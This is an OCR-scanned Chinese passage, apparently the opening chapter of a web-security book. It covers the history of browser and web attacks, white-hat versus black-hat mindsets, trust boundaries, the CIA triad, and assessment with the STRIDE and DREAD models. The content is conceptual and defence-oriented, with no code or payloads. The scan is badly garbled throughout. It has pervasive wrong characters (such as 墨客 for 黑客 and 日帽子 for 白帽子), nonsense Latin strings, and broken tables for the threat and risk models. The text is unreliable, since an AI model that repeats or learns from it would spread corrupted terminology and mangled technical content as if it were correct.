浏 咒 絮 访问 该 网 页 ， 利 用 浏 咒 絮 中 存在 的 某 些 漏洞 ， 比 如 一 个 缓冲 区 
洲 出 漏洞 ， 执 行 shellcode， 通 常 是 下 载 一 个 木马 并 在 用 户 机 器 里 执行 。 
常见 的 针对 时 面 软件 的 攻击 目标 ， 还 包括 微软 的 Office 系 列 软件 、 
Adobe Acrobat Reader、 多 媒体 播放 软件 、 压 缩 软 件 等 装机 量 大 的 流行 
软件 ， 都 曾经 成 为 墨客 们 的 最 爱 。 但 是 这 种 攻击 ， 和 本 书 要 讨论 的 Web 
安全 还 是 有 着 本 质 的 区 别 ， 所 以 即使 浏览 器 安全 是 Web 安 全 的 重要 组 成 
部 分 ， 但 在 本 书 中 ， 也 只 会 讨论 浏览 器 和 Web 安 全 有 关 的 部 分 。 

1.1.3 Web 安全 的 兴 

Web 攻 击 技术 的 发 展 也 可 以 分 为 几 个 阶段 。 在 Web 1.0 时 代 ， 人 们 更 多 
的 是 关注 服务 器 端 动态 脚本 的 安全 问题 ， 比 如 将 一 个 可 执行 脚本 R 
称 webshell) 上 传 到 服务 器 上 ， 从 而 获得 权限 。 动 态 脚本 语言 的 普及 ， 
以 及 Web 技 术 发 展 初期 对 安全 问题 认 知 的 不 足 导致 很 多 “血案 ”的 发 生 ， 
同时 也 遗留 下 很 多 历史 问题 ， 比 如 PHP 语 言 至 今 仍 然 只 能 靠 较 好 的 代码 


人 


SQL 注入 的 出 现 是 web 安 全 史上 的 一 个 里 程 碑 ， 它 最 早出 现 大 概 是 在 
1999 年 ， 并 很 快 就 成 为 Web 安 全 的 头号 大 敌 。 就 如 同 缓冲 区 溢出 出 现时 
一 样 ， 程 序 员 们 不 得 不 日 以 继 夜 地 去 修改 程序 中 存在 的 漏洞 。 黑 客 们 
发 现 通过 SQL 注入 攻击 ， 可 以 获取 很 多 重要 的 、 敏 感 的 数据 ， 甚 至 能 
够 通过 数据 库 获取 系统 访问 权限 ， 这 种 效果 并 不 比 直接 攻击 系统 软件 
差 ，Web 攻 击 一 下 子 就 流行 起 来 。SQL 注 入 漏洞 至 今 仍然 是 web 安 全 领 
域 中 的 一 个 重要 组 成 部 分 。 

Xss 〈 跨 站 脚本 攻击 ) 的 出 现 则 是 web 安 全 史上 的 另 一 个 里 程 碑 。 实 际 
上 ，XSS 的 出 现时 间 和 SQL 注入 差不多 ， 但 是 真正 引起 人 们 重视 则 是 在 
大 概 2003 年 以 后 。 在 经 历 了 MySpace 的 XSS 蠕 虫 事 件 后 ， 安 全 界 对 XSS 
0 


伴随 着 Web 2.0 的 兴起 ，XSS、CSRF 等 攻击 已 经 变 得 更 为 强大 。Web 攻 
击 的 思路 也 从 服务 右 端 转 回 了 客户 端 ， 转 回 了 浏览 右 和 用 户 。 黑 客 们 
天 马 行 空 的 思路 ， 覆 盖 了 Web 的 每 一 个 环节 ， 变 得 更 加 的 多 样 化 ， 这 些 
安全 问题 ， 在 本 书后 续 的 章节 中 会 深入 地 探讨 。 

Web 技 术 发 展 到 今天 ， 构 建 出 了 丰富 多 彩 的 互联 网 。 互 联网 业务 的 鞍 勃 
发 展 ， 也 催生 出 了 许多 新 兴 的 脚本 语言 ， 比 如 Python、Ruby、NodeJS 
等 ， 敏 捷 开 发 成 为 互联 网 的 主旋律 。 而 手机 技术 、 移 动 互 联网 的 兴 
起 ， 也 给 HTML 5 带 来 了 新 的 机 遇 和 挑战 。 与 此 同时 ，Web 安 全 技术 ， 
也 将 紧 跟 着 互联 网 发 展 的 脚步 ， 不 断 地 演化 出 新 的 变化 。 
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正如 一 个 硬币 有 两 面 一 样 , “墨客 ”也 有 好 坏 之 分 。 在 墨客 的 世界 中 ， 
往往 用 帆 子 的 颜色 来 比喻 黑客 的 好 坏 。 日 帽子 ， 则 是 指 那 些 精通 安全 
技术 ， 但 十 工作 在 反 黑 客 领域 的 专家 们 ; 而 黑 帽 子 ， 则 是 指 利 用 黑客 
技术 造成 破坏 ， 甚 至 进行 网 络 犯 罪 的 群体 。 
同样 是 研究 安全 ， 白 帽子 和 黑 帽 子 在 工作 时 的 心态 是 完全 不 同 的 。 
对 于 黑 帆 子 来 说 ， 只 要 能 够 找到 系统 的 一 个 弱点 ， 束 可 以 达到 入 侵 系 
统 的 目的 ， 而 对 于 日 帽子 来 说 ， 必 须 找到 系统 的 所 有 弱点 ， 不 能 有 扯 
漏 ， 才 能 保证 系统 不 会 出 现 问题 。 这 种 差异 是 由 于 工作 环境 与 工作 目 
标的 不 同 所 导致 的 。 白 帽子 一 般 为 企业 或 安全 公司 服务 ， 工 作 的 出 发 
点 融 是 要 解决 所 有 的 安全 问题 ， 因 此 所 看 所 想必 然 要 求 更 加 的 全 面 、 
安 观 ;， 墨 帽 子 的 主要 目的 是 要 入 侵 系 统 ， 找 到 对 他 们 有 价值 的 数据 ， 
因此 黑 帽 子 只 需要 以 点 突破 ， 找 到 对 他 们 最 有 用 的 一 点 ， 以 此 渗透 ， 
因此 思考 问题 的 出 发 点 必然 是 有 选择 性 的 、 微 观 的。 
从 对 待 问题 的 角度 来 看 ， 黑 帽子 为 了 完成 一 次 入 侵 ， 需 要 利用 各 种 不 
同 漏 润 的 组 合 来 达到 目的 ， 是 在 不 断 地 组 合 问题 ， 而 白 帆 子 在 设计 和 解 
决 方案 时 ， 如 果 只 看 到 各 种 问题 组 合 后 产生 的 效果 ， 束 会 把 事情 变 复 
杂 ， 难 以 细致 入 微 地 解决 根本 问题 ， 所 以 日 帽子 必然 是 在 不 断 地 分 解 
问题 ， 再 对 分 解 后 的 问题 逐个 予以 解决 。 
这 种 定位 的 不 对 称 ， 也 导致 了 白 帽 子 的 安全 工作 比较 难 做 。“ 破 坏 永远 
比 建设 容易 ”， 但 凡事 都 不 是 绝对 的 。 要 如 何 扭转 这 种 局 面 呢 ? 一 般 来 
说 ， 日 帽子 选择 的 方法 ， 是 克服 某 种 攻击 方法 ， 而 并 非 抵 御 单 次 的 攻 
击 。 比 如 设计 一 个 解决 方案 ， 在 特定 环境 下 能 够 抵御 所 有 已 知 的 和 未 
知 的 SQL Injection 问 题 。 假 设 这 个 方案 的 实施 周期 征 3 个 月 ， 那 么 执行 
3 个 月 后 ， 所 有 的 SQL injection 问题 都 得 到 了 解决 ， 也 殉 意 味 痢 墨客 再 
也 无 法 利用 SQL Injection 这 一 可 能 存在 的 弱点 入 侵 网 站 了 “。 如 采 做 到 
那么 白 帽 子 们 就 在 SQL injection 的 局 部 对 抗 中 化 被 动 为 主 
4 o 
但 这 一 切 都 是 理想 状态 ， 在 现实 世界 中 ， 存 在 着 各 种 各 样 不 可 回避 的 
问题 。 工 程 师 们 很 喜欢 一 句 话 : “No Patch For Stupid! ”， 在 安全 领域 
普遍 认为 :“ 最 大 的 漏洞 就 是 人 ! ”。 写 得 再 好 的 程序 ， 在 有 人 参与 
的 情况 下 ， 束 可 能 会 出 现 各 种 各 样 不 可 预知 的 情况 ， 比 如 管理 员 的 密 
码 有 可 能 泄露 ， 程 序 员 有 可 能 天 挥 了 安全 的 配置 参数 ， 等 等 。 安 全 问 
题 往 往 发 生 在 一 些 意 想 不 到 的 地 方 。 


男 一 方面 ， 防 御 技 术 在 不 断 完善 的 同时 ， 攻 击 技术 也 在 不 断 地 发 展 。 
这 瑟 像 一 场 军 备 范 赛 ， 看 谁 跑 在 前 面 。 日 帽子 们 刚 把 某 一 种 源 润 全 首 
堵 上 ， 墨 帽子 们 转眼 又 会 玩 出 新 花样 。 谁 能 在 技术 上 领先 ， 谁 融 能 占 
据 主动 。 互 联网 技术 日 新 月 异 ， 在 新 技术 领域 的 发 展 中 ， 也 存在 着 同 
样 的 博 价 过 程 。 可 现状 古 ， 如 果 新 技术 不 在 一 开始 整 考 虑 安全 设计 的 
话 ， 防 御 技 术 束 必然 会 落后 于 攻击 技术 ， 导 致 历史 不 断 地 重复 。 
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讲 了 很 多 题 外 话 ， 最 终 回 到 正题 上 。 这 是 一 本 讲 Web 安 全 的 书 ， 在 本 
书 中 除了 讲解 必要 的 攻击 技术 原理 之 外 ， 最 终 重心 还 是 要 放 在 防御 的 
思路 和 实现 的 技术 上 。 

在 进行 具体 技术 的 讲解 之 前 ， 我 们 需要 先 清 楚 地 认识 到 “安全 的 本 
质 "， 或 者 说 ,“ 安 全 问题 的 本 质 ”。 

安全 是 什么 ? 什么 样 的 情况 下 会 产生 安全 问题 ? 我 们 要 如 何 看 竺 安全 
问题 ? 只 有 搞 明 日 了 7 这些 最 基本 的 问题 ， 才 能 明日 一 切 防 御 技 术 的 出 
发 虑 ， 才 能 明日 为 什么 我 们 要 这 样 做 ， 要 那样 做 。 

在 武侠 小 说 中 ， 一 个 真正 的 高 手 ， 对 武功 有 着 最 透彻 、 最 本 质 的 理 
解 ， 达 到 了 返 瑛 归真 的 境界 。 在 安全 领域 ， 笔 者 认为 摘 明 日 了 安全 的 
本 质 ， 束 好 比 学 会 了 “独孤 九 人 证 ”*”， 天 下 武功 万 变 不 离 其 未 ， 过 到 任何 
Be eal net CRU: GUN ote re le 
那么 ， 一 个 安全 问题 是 如 何 产 生 的 呢 ? 我 们 不 妨 先 从 现实 世界 入 手 。 
火车 站 、 机 场 里 ， 在 乘客 们 开始 正式 旅程 之 前 ， 都 有 一 个 必要 的 程 
F: 安全 检查 。 机 场 的 安全 检查 ， 会 扫描 乘客 的 行李 箱 ， 检 查 乘 客 身 
上 是 否 携 市 了 打火机 、 可 燃 液 体 等 危险 物品 。 抽 象 地 说 ， 这 种 安全 检 
查 ， 丈 是 过 滤 掉 有 害 的 、 人 危险 的 东西 。 因 为 在 飞行 的 过 程 中 ， 飞 机 远 
离 地 面 ， 如 有 果 发 生 危 险 ， 将 会 直接 危害 到 乘客 们 的 生命 安全 。 因 此 ， 
飞机 是 一 个 高 度 敏 感 和 重要 的 区 域 ， 任 何 有 人 危害 的 物品 都 不 应 该 进入 
ee 
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从 安全 的 角度 来 看 ， 我 们 将 不 同 重要 程度 的 区 域 划分 出 来 : 
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安全 检查 的 过 程 按 照 需 要 进行 过 滤 


通过 一 个 安全 检查 HE ML) 的 过 程 ， 可 以 梳理 未 知 的 人 或 物 ， 
使 其 变 得 可 信任 。 被 划分 出 来 的 具有 不 同 信任 级 别 的 区 域 ， 我 们 称 为 
信任 域 ， 划 分 两 个 不 同 信任 域 之 间 的 边界 ， 我 们 称 为 信任 边界 。 
数据 从 高 等 级 的 信任 域 流向 低 等 级 的 信任 域 ， 是 不 需要 经 过 安全 检查 
的 ; 数据 从 低 等 级 的 信任 域 流向 高 等 级 的 信任 域 ， 则 需要 经 过 信任 边 
界 的 安全 检查 。 
我 们 在 机 场 通过 安检 后 ， 想 要 从 候 机 厅 出 来 ， 是 不 需要 做 检查 的 ;但 
是 想 要 再 回 到 候 机 厅 ， 则 需要 再 做 一 次 安全 检查 ， 就 是 这 个 道理 。 
笔者 认为 ， 安 全 问题 的 本 质 是 信任 的 问题 。 
一 切 的 安全 方案 设计 的 基础 ， 都 是 建立 在 信任 关系 上 的 。 我 们 必须 相 
信 一 些 东 西 ， 必 须 有 一 些 最 基本 的 假设 ， 安 全 方案 才能 得 以 建立 ， 如 
果 我 们 否定 一 切 ， 安 全 方案 就 会 如 无 源 之 水 ， 无 根 之 木 ， 无 法 设计 ， 
也 无 法 完成 。 
举例 来 说 ， 假 设 我 们 有 份 很 重要 的 文件 要 好 好 保管 起 来 ， 能 想到 的 一 
个 方案 是 把 文件 < 锁 到 抽 尼 里。 这 里 就 包含 了 几 个 基本 的 假设 ， 首 
先 ， 制 作 这 把 锁 的 工匠 是 可 以 信任 的 ， 他 没有 私自 藏 一 把 钥匙 ， 其 
次 ， 制 作 抽 屁 的 工匠 没有 私自 给 抽 履 装 一 个 后 门 ， 最 后 ， 钥 匙 还 必须 
要 保管 在 一 个 不 会 出 问题 的 地 方 ， 或 者 交 给 值得 信任 的 人 保管 。 反 
之 ， 如 果 我 们 一 切 都 不 信任 ， 那 么 也 就 不 可 能 认为 文件 放 在 抽 屁 里 是 
安全 的 。 
当 制 锁 的 工匠 无 法 打开 锁 时 ， 文 件 才 是 安全 的 ， 这 是 我 们 的 假设 前 提 
之 一 。 但 是 如 果 那 个 工匠 私自 藏 有 一 把 钥匙 ， 那 么 这 份 文件 也 就 不 再 
安全 了 。 这 个 威胁 存在 的 可 能 性 ， 依 赖 于 对 工匠 的 信任 程度 。 如 果 我 
们 信任 工匠 ， 那 么 在 这 个 假设 前 提 下 ， 我 们 就 能 确定 文件 的 安全 性 。 
这 种 对 条 件 的 信任 程度 ， 是 确定 对 象 是 否 安全 的 基础 。 
在 现实 生活 中 ， 我 们 很 少 设想 最 极端 的 前 提 条 件 ， 因 为 极端 的 条 件 往 
往 意味 者 小 概率 以 及 高 成 本 ， 因 此 在 成 本 有 限 的 情况 下 ， 我 们 往往 会 
根据 成 本 来 设计 安全 方案 ， 并 将 一 些 可 能 性 较 大 的 条 件 作为 决策 的 主 
代 o 
比如 在 设计 物理 安全 时 ， 根 据 不 同 的 地 理 位 置 、 不 同 的 政治 环境 等 ， 
需要 考虑 台风 、 地 震 、 战 争 等 因素 。 但 在 考虑 、 设 计 这 些 安全 方案 
时 ， 根 据 其 发 生 的 可 能 性 ， 需 要 有 不 同 的 侧重 点 。 比 如 在 大 陆 深 处 ， 
考虑 台风 的 因素 则 显得 不 太 实际 ， 同 样 的 道理 ， 在 大 陆 板块 稳定 的 地 
区 ， 考 虑 地 震 的 因素 也 会 带 来 较 高 的 成 本 。 而 极端 的 情况 比如 “ 蔡 星 撞 


击 地 球 后 如 何 保证 机 房 不 受 影响 ”的 问题 ， 一 般 都 不 在 考虑 之 中 ， 因 为 
发 生 的 可 能 性 太 小 。 

从 男 一 个 角度 来 说 ， 一 旦 我 们 作为 决策 依据 的 条 件 被 打破 、 被 绕 过 ， 
那么 束 会 导致 安全 假设 的 前 提 条 件 不 再 可 靠 ， 变 成 一 个 伪 命 题 。 
此 ， 把 握 住 信任 条 件 的 度 ， 使 其 恰到好处 ， 正 是 设计 安全 方案 的 难点 
所 在 ， 也 是 安 全 这 [| 学问 的 艺术 魅力 所 在 。 


1.4 破除 迷信 ， 没 有 银 弹 
在 解决 安全 问题 的 过 程 中 ， 不 可 能 一 劳 水 逸 ， 也 就 是 说 “没有 银 弹 ”。 
一 般 来 说 ， 人 们 都 会 讨厌 态 烦 的 事情 ， 在 潜意识 里 希望 能 够 让 打 烦 越 
远 越 好 。 而 安全 ， 正 是 一 件 厅 烦 的 事情 ， 而 且 是 无 法 逃避 的 麻烦 。 任 
何人 想 要 一 筋 永 移 地 解决 安全 问题 ， 都 属于 一 相 情 愿 ， 是 “自己 骗 自 
己 ”， 是 不 现实 的 。 
安全 是 一 个 持续 的 过 程 。 
目 从 互联 网 有 了 安全 问题 以 来 ， 攻 击 和 防御 技术 就 在 不 断 人 碰撞 和 对 抗 
的 过 程 中 得 到 发 展 。 从 微观 上 来 说 ， 在 某 一 时 期 可 能 某 一 方 占 了 上 
风 ; 但 是 从 安 观 上 来 看 ， 某 一 时 期 的 攻击 或 防御 技术 ， 都 不 可 能 永远 
有 效 ， 永 远 用 下 去 。 这 是 因为 防御 技术 在 发 展 的 同时 ， 攻 击 技术 也 在 
不 断 发 展 ， 两 者 是 互相 促进 的 辩证 关系 。 以 不 变 的 防御 手段 对 抗 不 断 
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很 多 安全 厂商 在 推销 自己 产品 时 ， 会 向 用 户 展示 一 些 很 美好 的 蓝图 ， 
似乎 他 们 的 产品 无 所 不 能 ， 购 买 之 后 用 户 束 可 以 睡 得 安稳 了 。 但 实际 
上 ， 安 全 产品 本 喘 也 需要 不 断 地 升级 ， 也 需要 有 人 来 运营 。 产 品 本 刁 
也 需要 一 个 新 陈 代谢 的 过 程 ， 否 则 就 会 被 淘汰 。 在 现代 的 互联 网 产品 
中 ， 目 动 升 级 功能 已 经 成 为 一 个 标准 配置 ， 一 个 有 活力 的 产品 总 是 会 
不 断 地 改进 目 身 。 
微软 在 发 布 Vista 时 ， 曾 信 碑 旦 旦 地 保证 这 是 有 史 以 来 最 安全 的 操作 系 
统 。 我 们 看 到 了 微软 的 努力 ， 在 Vista 下 的 安全 问题 确实 比 它 的 前 佛 们 
(Windows XP ` Windows 2000 ` Windows 2003 等 ) 少 了 许多 ， 尤 其 是 
高 危 的 漏洞 。 但 即便 如 此 ， 在 2008 年 的 Pwn2own 竞 赛 上 ，YVista 也 被 黑 
客 们 攻击 成 功 。Pwn2own 竞 赛 是 每 年 举行 的 让 墨客 们 任意 攻击 操作 系 
统 的 一 次 盛会 ， 一 般 墨 客 们 都 会 提前 准备 好 0day 漏 洞 的 攻击 程序 ， 以 
oKEPwn20wn.E.— 2E XP RE ° 
墨客 们 在 不 断 地 人 研究 和 寻找 新 的 攻击 技术 ， 作 为 防御 的 一 方 ， 没 有 理 
由 不 持续 跟 进 。 微 软 近 几 年 在 产品 的 安全 中 做 得 越 来 越 好 ， 其 所 推崇 
的 安全 开发 流程 ， 将 安全 检查 人员 罕 于 整个 软件 生命 周期 中 ， 经 过 实践 
检验 ， 证 明 这 是 一 条 可 行 的 道路 。 对 每 一 个 产品 ， 都 要 持续 地 实施 严 
格 的 安全 检查 ， 这 是 微软 通过 自 喘 的 教训 传授 给 业界 的 宝贵 经 验 。 而 
安全 检查 本 身 也 需要 不 断 更 新 ， 增 加 针对 新 型 攻击 方式 的 检测 与 防御 


方案 。 


15 ”安全 三 要 素 

既然 安全 方案 的 设计 与 实施 过 程 中 没有 银 弹 ， 注 定 是 一 个 持续 进行 的 
过 程 ， 那 么 我 们 该 如 何 开始 昵 ? 其 实 安 全 方案 的 设计 也 有 着 一 定 的 思 
路 与 方法 可 循 ， 借 助 这 些 方法 ， 能 够 理 清 我 们 的 思路 ， 帮 助 我 们 设计 
出 合理 、 优 秀 的 解决 方案 。 

因为 信任 关系 馈 破 坏 ， 从 而 产生 了 安全 问题 。 我 们 可 以 通过 信任 域 的 
划分 、 信 任 边界 的 确定 ， 来 发 现 问 题 是 在 何 处 产生 的 。 这 个 过 程 可 以 
让 我 们 明确 目标 ， 那 接 下 来 该 怎么 做 呢 ? 

在 设计 安全 方案 之 前 ， 要 正确 、 全 面 地 看 待 安全 问题 。 

要 全 面 地 认识 一 个 安全 问题 ， 我 们 有 很 多 种 办 法 ， 但 首先 要 理解 安全 
问题 的 组 成 属性 。 前 人 通过 无 数 实践 ， 最 后 将 安全 的 属性 总 结 为 安全 
三 要 素 ， 简 称 CIA 
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(Confidentiality) 、 完 整 性 (Integrity) 、 可 用 性 (Availability) ° 
0 加 密 是 实现 机 密 性 要 求 的 常见 手 
Ty 。 


比如 在 前 文 的 例子 中 ， 如 果 文 件 不 是 放 在 抽 履 里 ， 而 征 放 在 一 个 透明 
的 玻璃 盒子 里 ， 那 么 虽然 外 人 无 法 直接 取得 文件 ， 但 因为 玻璃 盒子 坪 
透明 的 ， 文 件 内 容 可 能 还 是 会 被 人 看 到 ， 所 以 不 符合 机 窖 性 有 要求。 但 
征 如 果 给 文件 增加 一 个 封面 ， 掩 兰 了 文件 内 容 ， 那 么 也 就 起 到 了 隐藏 
的 效果 ， 从 而 满足 了 机 密 性 要 求 。 可见， 我 们 在 选择 安全 方案 时 ， 需 
要 灵活 变通 ， 因 地 制 宜 ， 没 有 一 成 不 变 的 方案 。 

完整 性 则 有 要求 傈 护 数 据 内 容 是 完整 、 没 有 被 个 改 的 。 利 见 的 保证 一 至 
性 的 技术 手段 是 数 子 签名 。 

传说 清朝 康 巾 呈 芝 的 遗诏 ， 写 的 钙 “ 传 位 十 四 子 ”， 被 当时 还 古 四 阿 哥 
的 骨 祯 自 改 了 遗诏 ， 变 成 了 “ 传 位 于 四 子 ”。 她 且 不 论 传说 的 真实 性 ， 
在 故事 中 ， 对 这 份 遗 诏 的 保护 显然 没有 达到 完整 性 要 求 。 如 琳 在 当时 
有 数字 签名 等 技术 ， 壮 诏 束 很 难 锌 鞭 改 。 从 这 个 故事 中 也 可 以 看 出 数 
据 的 完整 性 、 一 致 性 的 重要 意义 。 

可 用 性 要 求 保护 资源 旦 “ 随 需 而 得 ”。 

假设 一 个 停车 场 里 有 100 个 车 位 ， 在 正常 情况 下 ， 可 以 停 100 辆 车 。 但 
征 在 某 一 天 ， 有 个 坏人 搬 了 100 块 大 石头 ， 把 每 个 车 位 都 占用 了 ， 俘 车 
场 无 法 再 提供 正常 服务 。 在 安全 领域 中 这 种 攻击 叫做 拒绝 服务 攻击 ， 


T (Denial of Service) 。 拒 绝 服务 攻击 破坏 的 是 安全 的 可 用 


在 安全 领域 中 ， 最 基本 的 要 素 束 是 这 三 个 ， 后 来 还 有 人 想 扩充 这 些 要 
素 ， 增 加 了 诸如 可 审计 性 、 不 可 抵赖 性 等 ， 但 最 最 重要 的 还 是 以 上 三 
个 要 素 。 在 设计 安全 方案 时 ， 也 要 以 这 三 个 要 素 为 基本 的 出 发 点 ， 去 
全 面 地 思考 所 面 对 的 问题 。 


1.6 ”如 何 实施 安全 评估 

有 了 前 面 的 基础 ， 我 们 就 可 以 正式 开始 分 析 并 解决 安全 问题 了 。 一 个 
安全 评估 的 过 程 ， 可 以 简单 地 分 为 4 个 阶段 ， 资产 等 级 划分 、 威 胁 分 
析 、 风 险 分 析 、 确 认 解 决 方案 。 


资产 等 级 划分 | 


EHI 


风险 分 析 


确认 解决 方案 


安全 评估 的 过 程 

一 般 来 说 ， 按 照 这 个 过 程 来 实施 安全 评估 ， 在 结果 上 不 会 出 现 较 大 的 
问题 。 这 个 实施 的 过 程 是 层 层 递 进 的 ， 前 后 之 间 有 因果 关系 。 

如 果 面 对 的 是 一 个 尚未 评估 的 系统 ， 那 么 应 该 从 第 一 个 阶段 开始 实 
施 ， 如 果 是 由 专职 的 安全 团队 长 期 维护 的 系统 ， 那 么 有 些 阶段 可 以 只 
实施 一 次 。 在 这 几 个 阶段 中 ， 上 一 个 阶段 将 决定 下 一 个 阶段 的 目标 ， 
需要 实施 到 什么 程度 。 

1.6.1 资产 等 级 划分 

资产 等 级 划分 是 所 有 工作 的 基础 ， 这 项 工作 能 够 帮助 我 们 明确 目标 是 
什么 ， 要 保护 什么 。 

我 们 前 面 提 到 安全 三 要 素 时 ， 机 密 性 和 完整 性 都 是 与 数据 相关 的 ， 在 
可 用 性 的 定义 里 ， 笔 者 则 用 到 了 “资源 ”一 词 。“ 资 源 ” 这 个 概念 描述 的 范 
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户 数据 驱动 的 一 一 用 户 产生 业务 ， 业 务 产 生 数 据 。 互 联网 公司 除了 拥 
有 一 些 固定 资产 ， 如 服务 器 等 死 物 外 ， 节 核心 的 价值 就 是 其 拥有 的 用 
户 数据 ， 所 以 
互联 网 安全 的 核心 问题 ， 是 数据 安全 的 问题 。 

这 与 我 们 做 资产 评估 义 有 什么 关系 呢 ? 有 ， 因 为 对 互联 网 公司 拥有 的 
贷 产 进行 等 级 划分 ， 殊 是 对 数据 做 等 级 划分 。 有 的 公司 最 关心 的 十 客 
户 数据 ， 有 的 公司 最 关心 的 是 员工 资料 信息 ， 根 据 各 自 业 务 的 不 同 ， 
侧重 点 也 不 同 。 做 资产 等 级 划分 的 过 程 ， 需 要 与 各 个 业务 部 门 的 负责 
人 一 一 沟通 ， 了 人 解 公 司 最 重要 的 资产 古 什么 ， 他 们 最 看 重 的 数据 是 什 
么 。 通 过 访谈 的 形式 ， 安 全 部 门 才 能 熟悉 、 了 解 公司 的 业务 ， 公 司 所 
本 
当 完 成 资产 等 级 划分 后 ， 对 要 保护 的 目标 已 经 有 了 一 个 大 概 的 了 解 ， 
返 下 来 束 古 要 划分 信任 域 和 信任 边界 了。 通常 我 们 用 一 种 最 简单 的 划 
分 方式 ， 束 是 从 网 络 逻 辑 上 来 划分 。 比 如 最 重要 的 数据 放 在 数据 库 
里 ， 那 么 把 数据 库 的 服务 卓 圈 起 来 ，Web 应 用 可 以 从 数据 库 中 读 / 写 数 
据 ， 并 对 外 提供 服务 ， 那 再 把 Web 服 务 器 圈 起 来 ， 最 外 面 是 不 可 信任 的 
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人 简单 网 站 信任 模型 
这 和 是 最 简单 的 例子 ， 在 实际 中 会 遇 到 比 这 复杂 许多 的 情 旋 。 比 如 同样 


是 两 个 应 用 ， 互 相 之 间 存 在 数据 交互 业务 ， 那 么 就 要 考虑 这 里 的 数据 
交互 对 于 各 自 应 用 来 说 是 否 是 可 信 的 ， 是 否 应 该 在 两 个 应 用 之 间 划 一 
个 边界 ， 然 后 对 流 经 边界 的 数据 做 安全 检查 。 

1.6.2 威胁 分 析 

信任 域 划 好 之 后 ， 我 们 如 何 才能 确定 危险 来 自 哪里 昵 ? 在 安全 领域 
里 ， 我 们 把 可 能 造成 危害 的 来 源 称 为 威胁 (Threat) ， 而 把 可 能 会 出 现 
的 损失 称 为 风险 (Risk) 。 风 险 一 定 是 和 损失 联系 在 一 起 的 ， 很 多 专业 
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把 这 两 个 概念 区 分 好 ， 有 助 于 我 们 接 下 来 要 提 到 的 “威胁 建 模 ”" 和 “风险 
分 析 ” 两 个 阶段 ， 这 两 个 阶段 的 联系 是 很 紧密 的 。 

什么 是 威胁 分 析 ? 威胁 分 析 束 是 把 所 有 的 威胁 都 找 出 来 。 怎么 找 ? 一 
般 是 采用 头脑 风暴 法 。 当 然 ， 也 有 一 些 比较 科学 的 方法 ， 比 如 使 用 一 
个 模型 ， 帮 助 我 们 去 想 ， 在 哪些 方面 有 可 能 会 存在 威胁 ， 这 个 过 程 能 
TSE pU. Le BUE SEES. 。 


在 本 书 中 介绍 一 种 威胁 建 模 的 方法 ， 它 最 早 是 由 微软 提出 的 ， 叫 做 
STRIDE 模 型 。 

STRIDE 是 6 个 单词 的 首 字母 缩写 ， 我 们 在 分 析 威 胁 时 ， 可 以 从 以 下 6 个 
方面 去 考虑 。 


Repudiation (JRM) 省 认 做 过 的 事情 AUGE 
ToformationDisclosure (RAWS) 机 密 信 息 涝 器 


Denial of Service (拒绝 服务 ) 拒绝 服务 可 用 性 


Elevation of Privilege (提升 权限 ) 未 经 授权 获得 许可 


在 进行 威胁 分 析 时 ， 要 尺 可 能 地 不 遗漏 威胁 ， 头 脑 风 骏 的 过 程 可 以 确 
定 攻 击 面 (Attack Sur-face) 。 
在 维护 系统 安全 时 ， 最 让 安全 工程 师 诅 形 的 事情 加 是 花费 很 多 的 时 间 
与 精力 实施 安全 方案 ， 但 是 攻击 者 却 利 用 了 事先 完全 没有 想到 的 漏洞 
(漏洞 的 定义 : 系统 中 可 能 被 威胁 利用 以 造成 危害 的 地 方 。) 完成 入 
侵 。 这 往往 就 是 由 于 在 确定 攻击 面 时 ， 想 的 不 够 全 面 而 导致 鸭 。 
以 前 有 部 老 电 影 叫做 《 智 取 华山 》， 是 根据 真实 事件 改编 的 。1949 年 5 
月 中 旬 ， 打 啊 了 * 陕 中 战役 ”， 国 民 和 党 保安 第 6 旅 旅 长 兼 第 8 区 专员 韩 子 
佩 率 残部 400 余 人 逃 上 华山 ， 企 图 凭借 * 上 自古 华山 一 条 道 ” 的 天 险 负 隅 项 
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小 分 队 ， 在 当地 村 民 的 带领 下 ， 找 到 了 第 二 条 路 : MCR! 克服 种 种 
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代表 大 会 ， 并 被 授予 “全 国 特 等 战斗 英雄 ? 采 淮 称号 。 

我 们 用 安全 眼光 来 看 这 次 战斗 。 国 民 和 党 部 队 在 进行 “威胁 分 析 ” 时 ， 只 
考 虚 到 “自古 华山 一 条 道 "， 所 以 在 正路 上 布 重兵 ， 而 完全 忽略 了 其 他 
的 可 能 。 他 们 “相信 ”其 他 道路 是 不 存在 的 ， 这 是 他 们 实施 安全 方案 的 
基础 ， 而 一 旦 这 个 信任 基础 不 存在 了 ， 所 有 的 安全 方案 都 将 化 作 浮 
云 ， 从 而 被 共产 党 的 部 队 击败 。 

所 以 威胁 分 析 是 非常 重要 的 一 件 事情 ， 很 多 时 候 还 需要 经 常 回顾 和 更 
新 现 有 的 模型 。 可 能 存在 很 多 威胁 ， 但 并 非 每 个 威胁 都 会 造成 难以 承 
受 的 损失 。 一 个 威胁 到 底 能 够 造成 多 大 的 危害 ， 如 何 去 衡 量 它 ? LU 
要 考虑 到 风险 了 。 我 们 判断 风险 高 低 的 过 程 ， 就 是 风险 分 析 的 过 程 。 
在 “风险 分 析 ” 这 个 阶段 ， 也 有 模型 可 以 帮助 我 们 进行 科学 的 思考 。 
1.6.3 ”风险 分 析 

风险 由 以 下 因素 组 成 : 

Risk = Probability * Damage Potential 

影响 风险 高 低 的 因素 ， 除 了 造成 损失 的 大 小 外 ， 还 需要 考虑 到 发 生 的 
可 能 性 。 地 震 的 危害 很 大 ， 但 是 地 震 、 火 山 活动 一 般 是 在 大 陆 板块 边 
绿 频繁 出 现 ， 比 如 日 本 、 印 尼 束 处 于 这 些 地 理 位 置 ， 因 此 地 震 频 发 ; 
而 在 大 陆 板块 中 心 ， 铬 是 地 质 结构 以 整 块 的 宕 石 为 主 ， 则 不 太 容 易 发 
生地 震 ， 因 此 地 震 的 风险 就 要 小 很 多 。 我 们 在 考虑 安全 问题 时 ， 要 结 
合 具 体 情 况 ， 权 衡 事 件 发 生 的 可 能 性 ， 才 能 正确 地 判断 出 风险 。 

如 何 更 科学 地 衡量 风险 呢 ? 这 里 再 介绍 一 个 DREAD 模 型 ， 它 也 是 由 微 
软 提 出 的 。DREAD 也 是 几 个 单词 的 站 字母 缩写 ， 它 指导 我 们 应 该 从 哪 
些 方面 去 判断 一 个 威胁 的 风险 程度 。 


Damage 获取 完全 验证 权限 ; 执行 管理 员 操 
potential fis 非法 上 传 文件 


MUR 


攻击 者 可 以 重复 攻击 ， 但 有 时 间 | ”攻击 者 很 难 重复 攻击 
限制 过 各 

